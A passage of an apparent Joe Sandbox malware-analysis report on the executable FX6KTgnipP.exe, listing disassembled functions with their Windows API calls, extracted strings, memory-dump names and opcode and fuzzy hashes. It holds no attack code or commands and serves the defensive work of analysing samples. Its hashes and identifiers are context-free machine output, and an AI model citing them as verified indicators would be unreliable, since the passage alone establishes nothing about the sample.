                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: fe56142342e2a0fbeefee4b3b2a788526369d0d3b8cc2f76ca68b7ee17772696
                                                                                                                                                                            • Instruction ID: 3f74622e8b51940fc9c6427d49329c81842b5c50ab9a55b7f5dee60267deee5f
                                                                                                                                                                            • Opcode Fuzzy Hash: fe56142342e2a0fbeefee4b3b2a788526369d0d3b8cc2f76ca68b7ee17772696
                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF08974421210DBEA11AF24FD4E454BBE1F718B2430501DBF01D66671C7B218A1CFC5
                                                                                                                                                                            Function 00261F82 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00251309: __EH_prolog3.LIBCMT ref: 00251310
                                                                                                                                                                              • Part of subcall function 00251309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002517FB,?,?,\\?\,6294DA82,?,?,?,00000000,0027A279,000000FF), ref: 00251319
                                                                                                                                                                              • Part of subcall function 00251AD1: __EH_prolog3_GS.LIBCMT ref: 00251AD8
                                                                                                                                                                              • Part of subcall function 0024F763: __EH_prolog3_GS.LIBCMT ref: 0024F76A
                                                                                                                                                                              • Part of subcall function 0024F58B: __EH_prolog3_GS.LIBCMT ref: 0024F592
                                                                                                                                                                              • Part of subcall function 0024F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,0024A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0024F5A8
                                                                                                                                                                              • Part of subcall function 0024F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F5EB
                                                                                                                                                                            • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00262137
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 002622BE
                                                                                                                                                                            • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 002622D8
                                                                                                                                                                              • Part of subcall function 002514CC: __EH_prolog3_GS.LIBCMT ref: 002514D3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                                                                                                                                                            • String ID: .tmp
                                                                                                                                                                            • API String ID: 1688541384-2986845003
                                                                                                                                                                            • Opcode ID: 154bc683fdf24c7465b44cdcb9f41ec7e577b3441c3ebfebe4505bfeabfa15dd
                                                                                                                                                                            • Instruction ID: 6f3a2807ba52b0f5403e24482672bc3f73b5c554b2de031cf7cff016175aceb3
                                                                                                                                                                            • Opcode Fuzzy Hash: 154bc683fdf24c7465b44cdcb9f41ec7e577b3441c3ebfebe4505bfeabfa15dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 58C1DE71C20268DADB65DFA4CC85BDDB7B8BB09304F5441EAE449A2241DB345BE9CF21
                                                                                                                                                                            Function 0025EF21 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0025EBAA: GetDC.USER32(00000000), ref: 0025EBAE
                                                                                                                                                                              • Part of subcall function 0025EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025EBB9
                                                                                                                                                                              • Part of subcall function 0025EBAA: ReleaseDC.USER32(00000000,00000000), ref: 0025EBC4
                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0025EF65
                                                                                                                                                                              • Part of subcall function 0025F1EC: GetDC.USER32(00000000), ref: 0025F1F5
                                                                                                                                                                              • Part of subcall function 0025F1EC: GetObjectW.GDI32(?,00000018,?), ref: 0025F224
                                                                                                                                                                              • Part of subcall function 0025F1EC: ReleaseDC.USER32(00000000,?), ref: 0025F2BC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                            • String ID: ($kJ&
                                                                                                                                                                            • API String ID: 1061551593-2228923650
                                                                                                                                                                            • Opcode ID: a6959f6ff0764321ad0a7d568c5877059d1ce4cd26bc2390e17c3d8a3eabed3b
                                                                                                                                                                            • Instruction ID: 433138d4fa37d125549eb7b5670686e6b56bbaa4c376957f1d4821bf5f424b90
                                                                                                                                                                            • Opcode Fuzzy Hash: a6959f6ff0764321ad0a7d568c5877059d1ce4cd26bc2390e17c3d8a3eabed3b
                                                                                                                                                                            • Instruction Fuzzy Hash: E19102716183159FC750DF65D848A2BBBE9FF89B01F10491EF98AD7260CB70AD05CB62
                                                                                                                                                                            Function 0026EE2A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FX6KTgnipP.exe,00000104), ref: 0026EE6A
                                                                                                                                                                            • _free.LIBCMT ref: 0026EF35
                                                                                                                                                                            • _free.LIBCMT ref: 0026EF3F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                            • String ID: C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                            • API String ID: 2506810119-3530599616
                                                                                                                                                                            • Opcode ID: 985f5ac84e552fd72ae3bc6bf59bf64c1746613f660e40bd145fd4f3e7a52e35
                                                                                                                                                                            • Instruction ID: 58a29a63409939bb23d35f47e23575ff5e55c499d94892ee6e388b1a7c17c8d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 985f5ac84e552fd72ae3bc6bf59bf64c1746613f660e40bd145fd4f3e7a52e35
                                                                                                                                                                            • Instruction Fuzzy Hash: F4319F75A24258EFCF21DF99EC8599EBBFCEB85310F1140A6F80897201D7B18E94CB90
                                                                                                                                                                            Function 00269E56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00269E7B
                                                                                                                                                                            • _abort.LIBCMT ref: 00269F86
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EncodePointer_abort
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 948111806-2084237596
                                                                                                                                                                            • Opcode ID: 94941b5f52cfc19ce63a687a455c0db367ce9c46a1e13e39165c4ceafeb5451a
                                                                                                                                                                            • Instruction ID: 4a0f77f21ccdb39b51d7ea5ce99cb51a8c658e63cc4cee0a61ae3c2e8b9be041
                                                                                                                                                                            • Opcode Fuzzy Hash: 94941b5f52cfc19ce63a687a455c0db367ce9c46a1e13e39165c4ceafeb5451a
                                                                                                                                                                            • Instruction Fuzzy Hash: 49416A7191020AEFCF16DF94CD81AEEBBB9BF48304F254159FA14A7211D73599E0DB50
                                                                                                                                                                            Function 0025338E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __fprintf_l.LIBCMT ref: 0025340E
                                                                                                                                                                            • _strncpy.LIBCMT ref: 00253459
                                                                                                                                                                              • Part of subcall function 002589ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,0028E088,?,00000007,002533E2,?,?,00000050,6294DA82), ref: 00258A0A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                            • String ID: $%s$@%s
                                                                                                                                                                            • API String ID: 562999700-834177443
                                                                                                                                                                            • Opcode ID: b832841aeb95f1935ceb10d6589dfbb56b328adf4c27b2abb47816a8c206ee52
                                                                                                                                                                            • Instruction ID: 6ec39a72b19b60e5fe8be41f2b500e649b75de7463ec42897f79049dc73a7688
                                                                                                                                                                            • Opcode Fuzzy Hash: b832841aeb95f1935ceb10d6589dfbb56b328adf4c27b2abb47816a8c206ee52
                                                                                                                                                                            • Instruction Fuzzy Hash: A4219E72A2070EABDB11DEB8CC45EAE7BA8BB05301F040525FE14D7281D771EA69CB64
                                                                                                                                                                            Function 0025F8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025F8F7
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 0025F99F
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 0025F9E1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogH_prolog3_Window
                                                                                                                                                                            • String ID: ASKNEXTVOL
                                                                                                                                                                            • API String ID: 2321058237-3402441367
                                                                                                                                                                            • Opcode ID: 1f2eeff915d45c7c63047e57dfe834f92ca260f7bfd813aa65e8bb5285bced31
                                                                                                                                                                            • Instruction ID: e82ff0b93e03464ebc0f363a60ee9fd87f6ccecf8b87a5a852d8da82f994d4a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f2eeff915d45c7c63047e57dfe834f92ca260f7bfd813aa65e8bb5285bced31
                                                                                                                                                                            • Instruction Fuzzy Hash: B621A231630515BFCB55EF64DE4AFA937A9BB0A301F104065F9419B2A1C370A979CF29
                                                                                                                                                                            Function 00257445 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000,0025ABB6,?), ref: 00257484
                                                                                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000), ref: 0025748E
                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000), ref: 0025749E
                                                                                                                                                                            Strings
                                                                                                                                                                            • Thread pool initialization failed., xrefs: 002574B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                            • String ID: Thread pool initialization failed.
                                                                                                                                                                            • API String ID: 3340455307-2182114853
                                                                                                                                                                            • Opcode ID: 1650fe9dec180560ca6ec558c1ef28962659cd62bc252406dce81e3abe0ab4a5
                                                                                                                                                                            • Instruction ID: 87390786a0791775e461bf9242f6262f72fcf0609a7a1dca624ca608ddb11a18
                                                                                                                                                                            • Opcode Fuzzy Hash: 1650fe9dec180560ca6ec558c1ef28962659cd62bc252406dce81e3abe0ab4a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 231106B1654309AFC3315F76AC889A7FFECEB55745F20082EF5DAC3200D6B059948B64
                                                                                                                                                                            Function 0026406A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                            • API String ID: 0-56093855
                                                                                                                                                                            • Opcode ID: 66dab55481ceb671aad5b7663862feb9f580c793d976e5aa04b2e667b58a247f
                                                                                                                                                                            • Instruction ID: dcb21faf59621bace378fa0cdd909bbb06c0a9e062ce16f60f6e901d0c1511d5
                                                                                                                                                                            • Opcode Fuzzy Hash: 66dab55481ceb671aad5b7663862feb9f580c793d976e5aa04b2e667b58a247f
                                                                                                                                                                            • Instruction Fuzzy Hash: F611C234335320ABD715AF14FC4C9263BE8F74A381B04486AF585C3220C27298E0DF61
                                                                                                                                                                            Function 00241E44 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00253EAA: _swprintf.LIBCMT ref: 00253EEA
                                                                                                                                                                              • Part of subcall function 00253EAA: _strlen.LIBCMT ref: 00253F0B
                                                                                                                                                                              • Part of subcall function 00253EAA: SetDlgItemTextW.USER32(?,0028919C,?), ref: 00253F64
                                                                                                                                                                              • Part of subcall function 00253EAA: GetWindowRect.USER32(?,?), ref: 00253F9A
                                                                                                                                                                              • Part of subcall function 00253EAA: GetClientRect.USER32(?,?), ref: 00253FA6
                                                                                                                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                            • String ID: 0$gI&
                                                                                                                                                                            • API String ID: 2622349952-4135443430
                                                                                                                                                                            • Opcode ID: de6ea629c287ea1fae2aed85e4380cb7fb76dea7d5c3134d8be79928ca9f0c17
                                                                                                                                                                            • Instruction ID: 5be367aba842cddd7c4e08e75c131ac6d507cae18dc270e5bd1b319ff5364678
                                                                                                                                                                            • Opcode Fuzzy Hash: de6ea629c287ea1fae2aed85e4380cb7fb76dea7d5c3134d8be79928ca9f0c17
                                                                                                                                                                            • Instruction Fuzzy Hash: 70F0C238624249A7DF199F60EE0EBEA3BD8AF05345F048158FC48541E1C7B4CAF4EB50
                                                                                                                                                                            Function 0026A892 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0026A843,00000000,?,00296150,?,?,?,0026A9E6,00000004,InitializeCriticalSectionEx,0027F7F4,InitializeCriticalSectionEx), ref: 0026A89F
                                                                                                                                                                            • GetLastError.KERNEL32(?,0026A843,00000000,?,00296150,?,?,?,0026A9E6,00000004,InitializeCriticalSectionEx,0027F7F4,InitializeCriticalSectionEx,00000000,?,0026A79D), ref: 0026A8A9
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0026A8D1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                            • Opcode ID: f482b1b5fd60dd8dc4046a80b0e453b0643ea5fd1ebab1d2645d7de8bee682bb
                                                                                                                                                                            • Instruction ID: 219c03f31dcddcf1887ada9f38a85305411bd68e2e13504ec3dc52de00de3dfb
                                                                                                                                                                            • Opcode Fuzzy Hash: f482b1b5fd60dd8dc4046a80b0e453b0643ea5fd1ebab1d2645d7de8bee682bb
                                                                                                                                                                            • Instruction Fuzzy Hash: 74E04F7079020AB7EF202FB0ED0AB183A59AF10B91F204030FD0DB84E1E76198E19E96
                                                                                                                                                                            Function 002707EA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                            • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                                                                                                            • Instruction ID: 6bfb522a5ea288f5e2d6e34be4382b3a7e7c9854079ceef630b6a14278d77e02
                                                                                                                                                                            • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                                                                                                            • Instruction Fuzzy Hash: CCA16A71E20386DFEB11CF28C8D17AEBBE4EF51310F148169E69C9B282C6749D59CB51
                                                                                                                                                                            Function 00273638 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00270481,?,00000000,?,00000001,?,?,00000001,00270481,?), ref: 00273685
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0027370E
                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0026DBD1,?), ref: 00273720
                                                                                                                                                                            • __freea.LIBCMT ref: 00273729
                                                                                                                                                                              • Part of subcall function 0027040E: RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2652629310-0
                                                                                                                                                                            • Opcode ID: 9c3b82ba00a4045b869114ebc099bd9b89e1c5bd21d2db66b0e2a035eb3d13e2
                                                                                                                                                                            • Instruction ID: eaca14e5df34de9e319376902444f11e2d4a92b7ebad59e0031c7c1b9121fc38
